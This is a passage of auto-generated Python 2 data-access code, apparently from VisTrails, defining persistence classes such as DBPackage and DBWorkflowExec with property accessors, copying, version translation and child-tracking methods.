for obj in res:
new_obj.db_add_module_exec(obj)
elif hasattr(old_obj, 'db_module_execs') and old_obj.db_module_execs is not None:
for obj in old_obj.db_module_execs:
new_obj.db_add_module_exec(DBModuleExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_module_execs') and hasattr(new_obj, 'db_deleted_module_execs'):
for obj in old_obj.db_deleted_module_execs:
n_obj = DBModuleExec.update_version(obj, trans_dict)
new_obj.db_deleted_module_execs.append(n_obj)
if 'group_execs' in class_dict:
res = class_dict['group_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_group_exec(obj)
elif hasattr(old_obj, 'db_group_execs') and old_obj.db_group_execs is not None:
for obj in old_obj.db_group_execs:
new_obj.db_add_group_exec(DBGroupExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_group_execs') and hasattr(new_obj, 'db_deleted_group_execs'):
for obj in old_obj.db_deleted_group_execs:
n_obj = DBGroupExec.update_version(obj, trans_dict)
new_obj.db_deleted_group_execs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
to_del = []
for child in self.db_loop_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_loop_exec(child)
to_del = []
for child in self.db_module_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_module_exec(child)
to_del = []
for child in self.db_group_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_group_exec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_annotations)
children.extend(self.db_deleted_loop_execs)
children.extend(self.db_deleted_module_execs)
children.extend(self.db_deleted_group_execs)
if remove:
self.db_deleted_annotations = []
self.db_deleted_loop_execs = []
self.db_deleted_module_execs = []
self.db_deleted_group_execs = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_annotations:
if child.has_changes():
return True
for child in self._db_loop_execs:
if child.has_changes():
return True
for child in self._db_module_execs:
if child.has_changes():
return True
for child in self._db_group_execs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_ts_start(self):
return self._db_ts_start
def __set_db_ts_start(self, ts_start):
self._db_ts_start = ts_start
self.is_dirty = True
db_ts_start = property(__get_db_ts_start, __set_db_ts_start)
def db_add_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_change_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_delete_ts_start(self, ts_start):
self._db_ts_start = None
def __get_db_ts_end(self):
return self._db_ts_end
def __set_db_ts_end(self, ts_end):
self._db_ts_end = ts_end
self.is_dirty = True
db_ts_end = property(__get_db_ts_end, __set_db_ts_end)
def db_add_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_change_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_delete_ts_end(self, ts_end):
self._db_ts_end = None
def __get_db_cached(self):
return self._db_cached
def __set_db_cached(self, cached):
self._db_cached = cached
self.is_dirty = True
db_cached = property(__get_db_cached, __set_db_cached)
def db_add_cached(self, cached):
self._db_cached = cached
def db_change_cached(self, cached):
self._db_cached = cached
def db_delete_cached(self, cached):
self._db_cached = None
def __get_db_module_id(self):
return self._db_module_id
def __set_db_module_id(self, module_id):
self._db_module_id = module_id
self.is_dirty = True
db_module_id = property(__get_db_module_id, __set_db_module_id)
def db_add_module_id(self, module_id):
self._db_module_id = module_id
def db_change_module_id(self, module_id):
self._db_module_id = module_id
def db_delete_module_id(self, module_id):
self._db_module_id = None
def __get_db_group_name(self):
return self._db_group_name
def __set_db_group_name(self, group_name):
self._db_group_name = group_name
self.is_dirty = True
db_group_name = property(__get_db_group_name, __set_db_group_name)
def db_add_group_name(self, group_name):
self._db_group_name = group_name
def db_change_group_name(self, group_name):
self._db_group_name = group_name
def db_delete_group_name(self, group_name):
self._db_group_name = None
def __get_db_group_type(self):
return self._db_group_type
def __set_db_group_type(self, group_type):
self._db_group_type = group_type
self.is_dirty = True
db_group_type = property(__get_db_group_type, __set_db_group_type)
def db_add_group_type(self, group_type):
self._db_group_type = group_type
def db_change_group_type(self, group_type):
self._db_group_type = group_type
def db_delete_group_type(self, group_type):
self._db_group_type = None
def __get_db_completed(self):
return self._db_completed
def __set_db_completed(self, completed):
self._db_completed = completed
self.is_dirty = True
db_completed = property(__get_db_completed, __set_db_completed)
def db_add_completed(self, completed):
self._db_completed = completed
def db_change_completed(self, completed):
self._db_completed = completed
def db_delete_completed(self, completed):
self._db_completed = None
def __get_db_error(self):
return self._db_error
def __set_db_error(self, error):
self._db_error = error
self.is_dirty = True
db_error = property(__get_db_error, __set_db_error)
def db_add_error(self, error):
self._db_error = error
def db_change_error(self, error):
self._db_error = error
def db_delete_error(self, error):
self._db_error = None
def __get_db_machine_id(self):
return self._db_machine_id
def __set_db_machine_id(self, machine_id):
self._db_machine_id = machine_id
self.is_dirty = True
db_machine_id = property(__get_db_machine_id, __set_db_machine_id)
def db_add_machine_id(self, machine_id):
self._db_machine_id = machine_id
def db_change_machine_id(self, machine_id):
self._db_machine_id = machine_id
def db_delete_machine_id(self, machine_id):
self._db_machine_id = None
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def __get_db_loop_execs(self):
return self._db_loop_execs
def __set_db_loop_execs(self, loop_execs):
self._db_loop_execs = loop_execs
self.is_dirty = True
db_loop_execs = property(__get_db_loop_execs, __set_db_loop_execs)
def db_get_loop_execs(self):
return self._db_loop_execs
def db_add_loop_exec(self, loop_exec):
self.is_dirty = True
self._db_loop_execs.append(loop_exec)
self.db_loop_execs_id_index[loop_exec.db_id] = loop_exec
def db_change_loop_exec(self, loop_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == loop_exec.db_id:
self._db_loop_execs[i] = loop_exec
found = True
break
if not found:
self._db_loop_execs.append(loop_exec)
self.db_loop_execs_id_index[loop_exec.db_id] = loop_exec
def db_delete_loop_exec(self, loop_exec):
self.is_dirty = True
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == loop_exec.db_id:
if not self._db_loop_execs[i].is_new:
self.db_deleted_loop_execs.append(self._db_loop_execs[i])
del self._db_loop_execs[i]
break
del self.db_loop_execs_id_index[loop_exec.db_id]
def db_get_loop_exec(self, key):
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == key:
return self._db_loop_execs[i]
return None
def db_get_loop_exec_by_id(self, key):
return self.db_loop_execs_id_index[key]
def db_has_loop_exec_with_id(self, key):
return key in self.db_loop_execs_id_index
def __get_db_module_execs(self):
return self._db_module_execs
def __set_db_module_execs(self, module_execs):
self._db_module_execs = module_execs
self.is_dirty = True
db_module_execs = property(__get_db_module_execs, __set_db_module_execs)
def db_get_module_execs(self):
return self._db_module_execs
def db_add_module_exec(self, module_exec):
self.is_dirty = True
self._db_module_execs.append(module_exec)
self.db_module_execs_id_index[module_exec.db_id] = module_exec
def db_change_module_exec(self, module_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == module_exec.db_id:
self._db_module_execs[i] = module_exec
found = True
break
if not found:
self._db_module_execs.append(module_exec)
self.db_module_execs_id_index[module_exec.db_id] = module_exec
def db_delete_module_exec(self, module_exec):
self.is_dirty = True
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == module_exec.db_id:
if not self._db_module_execs[i].is_new:
self.db_deleted_module_execs.append(self._db_module_execs[i])
del self._db_module_execs[i]
break
del self.db_module_execs_id_index[module_exec.db_id]
def db_get_module_exec(self, key):
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == key:
return self._db_module_execs[i]
return None
def db_get_module_exec_by_id(self, key):
return self.db_module_execs_id_index[key]
def db_has_module_exec_with_id(self, key):
return key in self.db_module_execs_id_index
def __get_db_group_execs(self):
return self._db_group_execs
def __set_db_group_execs(self, group_execs):
self._db_group_execs = group_execs
self.is_dirty = True
db_group_execs = property(__get_db_group_execs, __set_db_group_execs)
def db_get_group_execs(self):
return self._db_group_execs
def db_add_group_exec(self, group_exec):
self.is_dirty = True
self._db_group_execs.append(group_exec)
self.db_group_execs_id_index[group_exec.db_id] = group_exec
def db_change_group_exec(self, group_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == group_exec.db_id:
self._db_group_execs[i] = group_exec
found = True
break
if not found:
self._db_group_execs.append(group_exec)
self.db_group_execs_id_index[group_exec.db_id] = group_exec
def db_delete_group_exec(self, group_exec):
self.is_dirty = True
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == group_exec.db_id:
if not self._db_group_execs[i].is_new:
self.db_deleted_group_execs.append(self._db_group_execs[i])
del self._db_group_execs[i]
break
del self.db_group_execs_id_index[group_exec.db_id]
def db_get_group_exec(self, key):
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == key:
return self._db_group_execs[i]
return None
def db_get_group_exec_by_id(self, key):
return self.db_group_execs_id_index[key]
def db_has_group_exec_with_id(self, key):
return key in self.db_group_execs_id_index
def getPrimaryKey(self):
return self._db_id
class DBPackage(object):
vtType = 'package'
def __init__(self, id=None, name=None, identifier=None, codepath=None, load_configuration=None, version=None, description=None, module_descriptors=None):
self._db_id = id
self._db_name = name
self._db_identifier = identifier
self._db_codepath = codepath
self._db_load_configuration = load_configuration
self._db_version = version
self._db_description = description
self.db_deleted_module_descriptors = []
self.db_module_descriptors_id_index = {}
self.db_module_descriptors_name_index = {}
if module_descriptors is None:
self._db_module_descriptors = []
else:
self._db_module_descriptors = module_descriptors
for v in self._db_module_descriptors:
self.db_module_descriptors_id_index[v.db_id] = v
self.db_module_descriptors_name_index[(v.db_name,v.db_namespace,v.db_version)] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBPackage.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBPackage(id=self._db_id,
name=self._db_name,
identifier=self._db_identifier,
codepath=self._db_codepath,
load_configuration=self._db_load_configuration,
version=self._db_version,
description=self._db_description)
if self._db_module_descriptors is None:
cp._db_module_descriptors = []
else:
cp._db_module_descriptors = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_module_descriptors]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_module_descriptors_id_index = dict((v.db_id, v) for v in cp._db_module_descriptors)
cp.db_module_descriptors_name_index = dict(((v.db_name,v.db_namespace,v.db_version), v) for v in cp._db_module_descriptors)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBPackage()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'identifier' in class_dict:
res = class_dict['identifier'](old_obj, trans_dict)
new_obj.db_identifier = res
elif hasattr(old_obj, 'db_identifier') and old_obj.db_identifier is not None:
new_obj.db_identifier = old_obj.db_identifier
if 'codepath' in class_dict:
res = class_dict['codepath'](old_obj, trans_dict)
new_obj.db_codepath = res
elif hasattr(old_obj, 'db_codepath') and old_obj.db_codepath is not None:
new_obj.db_codepath = old_obj.db_codepath
if 'load_configuration' in class_dict:
res = class_dict['load_configuration'](old_obj, trans_dict)
new_obj.db_load_configuration = res
elif hasattr(old_obj, 'db_load_configuration') and old_obj.db_load_configuration is not None:
new_obj.db_load_configuration = old_obj.db_load_configuration
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'description' in class_dict:
res = class_dict['description'](old_obj, trans_dict)
new_obj.db_description = res
elif hasattr(old_obj, 'db_description') and old_obj.db_description is not None:
new_obj.db_description = old_obj.db_description
if 'module_descriptors' in class_dict:
res = class_dict['module_descriptors'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_module_descriptor(obj)
elif hasattr(old_obj, 'db_module_descriptors') and old_obj.db_module_descriptors is not None:
for obj in old_obj.db_module_descriptors:
new_obj.db_add_module_descriptor(DBModuleDescriptor.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_module_descriptors') and hasattr(new_obj, 'db_deleted_module_descriptors'):
for obj in old_obj.db_deleted_module_descriptors:
n_obj = DBModuleDescriptor.update_version(obj, trans_dict)
new_obj.db_deleted_module_descriptors.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_module_descriptors:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_module_descriptor(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_module_descriptors)
if remove:
self.db_deleted_module_descriptors = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_module_descriptors:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_identifier(self):
return self._db_identifier
def __set_db_identifier(self, identifier):
self._db_identifier = identifier
self.is_dirty = True
db_identifier = property(__get_db_identifier, __set_db_identifier)
def db_add_identifier(self, identifier):
self._db_identifier = identifier
def db_change_identifier(self, identifier):
self._db_identifier = identifier
def db_delete_identifier(self, identifier):
self._db_identifier = None
def __get_db_codepath(self):
return self._db_codepath
def __set_db_codepath(self, codepath):
self._db_codepath = codepath
self.is_dirty = True
db_codepath = property(__get_db_codepath, __set_db_codepath)
def db_add_codepath(self, codepath):
self._db_codepath = codepath
def db_change_codepath(self, codepath):
self._db_codepath = codepath
def db_delete_codepath(self, codepath):
self._db_codepath = None
def __get_db_load_configuration(self):
return self._db_load_configuration
def __set_db_load_configuration(self, load_configuration):
self._db_load_configuration = load_configuration
self.is_dirty = True
db_load_configuration = property(__get_db_load_configuration, __set_db_load_configuration)
def db_add_load_configuration(self, load_configuration):
self._db_load_configuration = load_configuration
def db_change_load_configuration(self, load_configuration):
self._db_load_configuration = load_configuration
def db_delete_load_configuration(self, load_configuration):
self._db_load_configuration = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_description(self):
return self._db_description
def __set_db_description(self, description):
self._db_description = description
self.is_dirty = True
db_description = property(__get_db_description, __set_db_description)
def db_add_description(self, description):
self._db_description = description
def db_change_description(self, description):
self._db_description = description
def db_delete_description(self, description):
self._db_description = None
def __get_db_module_descriptors(self):
return self._db_module_descriptors
def __set_db_module_descriptors(self, module_descriptors):
self._db_module_descriptors = module_descriptors
self.is_dirty = True
db_module_descriptors = property(__get_db_module_descriptors, __set_db_module_descriptors)
def db_get_module_descriptors(self):
return self._db_module_descriptors
def db_add_module_descriptor(self, module_descriptor):
self.is_dirty = True
self._db_module_descriptors.append(module_descriptor)
self.db_module_descriptors_id_index[module_descriptor.db_id] = module_descriptor
self.db_module_descriptors_name_index[(module_descriptor.db_name,module_descriptor.db_namespace,module_descriptor.db_version)] = module_descriptor
def db_change_module_descriptor(self, module_descriptor):
self.is_dirty = True
found = False
for i in xrange(len(self._db_module_descriptors)):
if self._db_module_descriptors[i].db_id == module_descriptor.db_id:
self._db_module_descriptors[i] = module_descriptor
found = True
break
if not found:
self._db_module_descriptors.append(module_descriptor)
self.db_module_descriptors_id_index[module_descriptor.db_id] = module_descriptor
self.db_module_descriptors_name_index[(module_descriptor.db_name,module_descriptor.db_namespace,module_descriptor.db_version)] = module_descriptor
def db_delete_module_descriptor(self, module_descriptor):
self.is_dirty = True
for i in xrange(len(self._db_module_descriptors)):
if self._db_module_descriptors[i].db_id == module_descriptor.db_id:
if not self._db_module_descriptors[i].is_new:
self.db_deleted_module_descriptors.append(self._db_module_descriptors[i])
del self._db_module_descriptors[i]
break
del self.db_module_descriptors_id_index[module_descriptor.db_id]
del self.db_module_descriptors_name_index[(module_descriptor.db_name,module_descriptor.db_namespace,module_descriptor.db_version)]
def db_get_module_descriptor(self, key):
for i in xrange(len(self._db_module_descriptors)):
if self._db_module_descriptors[i].db_id == key:
return self._db_module_descriptors[i]
return None
def db_get_module_descriptor_by_id(self, key):
return self.db_module_descriptors_id_index[key]
def db_has_module_descriptor_with_id(self, key):
return key in self.db_module_descriptors_id_index
def db_get_module_descriptor_by_name(self, key):
return self.db_module_descriptors_name_index[key]
def db_has_module_descriptor_with_name(self, key):
return key in self.db_module_descriptors_name_index
def getPrimaryKey(self):
return self._db_id
class DBWorkflowExec(object):
vtType = 'workflow_exec'
def __init__(self, items=None, id=None, user=None, ip=None, session=None, vt_version=None, ts_start=None, ts_end=None, parent_id=None, parent_type=None, parent_version=None, completed=None, name=None):
self.db_deleted_items = []
self.db_items_id_index = {}
if items is None:
self._db_items = []
else:
self._db_items = items
for v in self._db_items:
self.db_items_id_index[v.db_id] = v
self._db_id = id
self._db_user = user
self._db_ip = ip
self._db_session = session
self._db_vt_version = vt_version
self._db_ts_start = ts_start
self._db_ts_end = ts_end
self._db_parent_id = parent_id
self._db_parent_type = parent_type
self._db_parent_version = parent_version
self._db_completed = completed
self._db_name = name
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBWorkflowExec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBWorkflowExec(id=self._db_id,
user=self._db_user,
ip=self._db_ip,
session=self._db_session,
vt_version=self._db_vt_version,
ts_start=self._db_ts_start,
ts_end=self._db_ts_end,
parent_id=self._db_parent_id,
parent_type=self._db_parent_type,
parent_version=self._db_parent_version,
completed=self._db_completed,
name=self._db_name)
if self._db_items is None:
cp._db_items = []
else:
cp._db_items = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_items]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_items_id_index = dict((v.db_id, v) for v in cp._db_items)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBWorkflowExec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'items' in class_dict:
res = class_dict['items'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_item(obj)
elif hasattr(old_obj, 'db_items') and old_obj.db_items is not None:
for obj in old_obj.db_items:
if obj.vtType == 'module_exec':
new_obj.db_add_item(DBModuleExec.update_version(obj, trans_dict))
elif obj.vtType == 'group_exec':
new_obj.db_add_item(DBGroupExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_items') and hasattr(new_obj, 'db_deleted_items'):
for obj in old_obj.db_deleted_items:
if obj.vtType == 'module_exec':
n_obj = DBModuleExec.update_version(obj, trans_dict)
new_obj.db_deleted_items.append(n_obj)
elif obj.vtType == 'group_exec':
n_obj = DBGroupExec.update_version(obj, trans_dict)
new_obj.db_deleted_items.append(n_obj)
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'user' in class_dict:
res = class_dict['user'](old_obj, trans_dict)
new_obj.db_user = res
elif hasattr(old_obj, 'db_user') and old_obj.db_user is not None:
new_obj.db_user = old_obj.db_user
if 'ip' in class_dict:
res = class_dict['ip'](old_obj, trans_dict)
new_obj.db_ip = res
elif hasattr(old_obj, 'db_ip') and old_obj.db_ip is not None:
new_obj.db_ip = old_obj.db_ip
if 'session' in class_dict:
res = class_dict['session'](old_obj, trans_dict)
new_obj.db_session = res
elif hasattr(old_obj, 'db_session') and old_obj.db_session is not None:
new_obj.db_session = old_obj.db_session
if 'vt_version' in class_dict:
res = class_dict['vt_version'](old_obj, trans_dict)
new_obj.db_vt_version = res
elif hasattr(old_obj, 'db_vt_version') and old_obj.db_vt_version is not None:
new_obj.db_vt_version = old_obj.db_vt_version
if 'ts_start' in class_dict:
res = class_dict['ts_start'](old_obj, trans_dict)
new_obj.db_ts_start = res
elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
new_obj.db_ts_start = old_obj.db_ts_start
if 'ts_end' in class_dict:
res = class_dict['ts_end'](old_obj, trans_dict)
new_obj.db_ts_end = res
elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
new_obj.db_ts_end = old_obj.db_ts_end
if 'parent_id' in class_dict:
res = class_dict['parent_id'](old_obj, trans_dict)
new_obj.db_parent_id = res
elif hasattr(old_obj, 'db_parent_id') and old_obj.db_parent_id is not None:
new_obj.db_parent_id = old_obj.db_parent_id
if 'parent_type' in class_dict:
res = class_dict['parent_type'](old_obj, trans_dict)
new_obj.db_parent_type = res
elif hasattr(old_obj, 'db_parent_type') and old_obj.db_parent_type is not None:
new_obj.db_parent_type = old_obj.db_parent_type
if 'parent_version' in class_dict:
res = class_dict['parent_version'](old_obj, trans_dict)
new_obj.db_parent_version = res
elif hasattr(old_obj, 'db_parent_version') and old_obj.db_parent_version is not None:
new_obj.db_parent_version = old_obj.db_parent_version
if 'completed' in class_dict:
res = class_dict['completed'](old_obj, trans_dict)
new_obj.db_completed = res
elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
new_obj.db_completed = old_obj.db_completed
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_items:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_item(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_items)
if remove:
self.db_deleted_items = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_items:
if child.has_changes():
return True
return False
def __get_db_items(self):
return self._db_items
def __set_db_items(self, items):
self._db_items = items
self.is_dirty = True
db_items = property(__get_db_items, __set_db_items)
def db_get_items(self):
return self._db_items
def db_add_item(self, item):
self.is_dirty = True
self._db_items.append(item)
self.db_items_id_index[item.db_id] = item
def db_change_item(self, item):
self.is_dirty = True
found = False
for i in xrange(len(self._db_items)):
if self._db_items[i].db_id == item.db_id:
self._db_items[i] = item
found = True
break
if not found:
self._db_items.append(item)
self.db_items_id_index[item.db_id] = item
def db_delete_item(self, item):
self.is_dirty = True
for i in xrange(len(self._db_items)):
if self._db_items[i].db_id == item.db_id:
if not self._db_items[i].is_new:
self.db_deleted_items.append(self._db_items[i])
del self._db_items[i]
break
del self.db_items_id_index[item.db_id]
def db_get_item(self, key):
for i in xrange(len(self._db_items)):
if self._db_items[i].db_id == key:
return self._db_items[i]
return None
def db_get_item_by_id(self, key):
return self.db_items_id_index[key]
def db_has_item_with_id(self, key):
return key in self.db_items_id_index
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_user(self):
return self._db_user
def __set_db_user(self, user):
self._db_user = user
self.is_dirty = True
db_user = property(__get_db_user, __set_db_user)
def db_add_user(self, user):
self._db_user = user
def db_change_user(self, user):
self._db_user = user
def db_delete_user(self, user):
self._db_user = None
def __get_db_ip(self):
return self._db_ip
def __set_db_ip(self, ip):
self._db_ip = ip
self.is_dirty = True
db_ip = property(__get_db_ip, __set_db_ip)
def db_add_ip(self, ip):
self._db_ip = ip
def db_change_ip(self, ip):
self._db_ip = ip
def db_delete_ip(self, ip):
self._db_ip = None
def __get_db_session(self):
return self._db_session
def __set_db_session(self, session):
self._db_session = session
self.is_dirty = True
db_session = property(__get_db_session, __set_db_session)
def db_add_session(self, session):
self._db_session = session
def db_change_session(self, session):
self._db_session = session
def db_delete_session(self, session):
self._db_session = None
def __get_db_vt_version(self):
return self._db_vt_version
def __set_db_vt_version(self, vt_version):
self._db_vt_version = vt_version
self.is_dirty = True
db_vt_version = property(__get_db_vt_version, __set_db_vt_version)
def db_add_vt_version(self, vt_version):
self._db_vt_version = vt_version
def db_change_vt_version(self, vt_version):
self._db_vt_version = vt_version
def db_delete_vt_version(self, vt_version):
self._db_vt_version = None
def __get_db_ts_start(self):
return self._db_ts_start
def __set_db_ts_start(self, ts_start):
self._db_ts_start = ts_start
self.is_dirty = True
db_ts_start = property(__get_db_ts_start, __set_db_ts_start)
def db_add_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_change_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_delete_ts_start(self, ts_start):
self._db_ts_start = None
def __get_db_ts_end(self):
return self._db_ts_end
def __set_db_ts_end(self, ts_end):
self._db_ts_end = ts_end
self.is_dirty = True
db_ts_end = property(__get_db_ts_end, __set_db_ts_end)
def db_add_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_change_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_delete_ts_end(self, ts_end):
self._db_ts_end = None
def __get_db_parent_id(self):
return self._db_parent_id
def __set_db_parent_id(self, parent_id):
self._db_parent_id = parent_id
self.is_dirty = True
db_parent_id = property(__get_db_parent_id, __set_db_parent_id)
def db_add_parent_id(self, parent_id):
self._db_parent_id = parent_id
def db_change_parent_id(self, parent_id):
self._db_parent_id = parent_id
def db_delete_parent_id(self, parent_id):
self._db_parent_id = None
def __get_db_parent_type(self):
return self._db_parent_type
def __set_db_parent_type(self, parent_type):
self._db_parent_type = parent_type
self.is_dirty = True
db_parent_type = property(__get_db_parent_type, __set_db_parent_type)
def db_add_parent_type(self, parent_type):
self._db_parent_type = parent_type
def db_change_parent_type(self, parent_type):
self._db_parent_type = parent_type
def db_delete_parent_type(self, parent_type):
self._db_parent_type = None
def __get_db_parent_version(self):
return self._db_parent_version
def __set_db_parent_version(self, parent_version):
self._db_parent_version = parent_version
self.is_dirty = True
db_parent_version = property(__get_db_parent_version, __set_db_parent_version)
def db_add_parent_version(self, parent_version):
self._db_parent_version = parent_version
def db_change_parent_version(self, parent_version):
self._db_parent_version = parent_version
def db_delete_parent_version(self, parent_version):
self._db_parent_version = None
def __get_db_completed(self):
return self._db_completed
def __set_db_completed(self, completed):
self._db_completed = completed
self.is_dirty = True
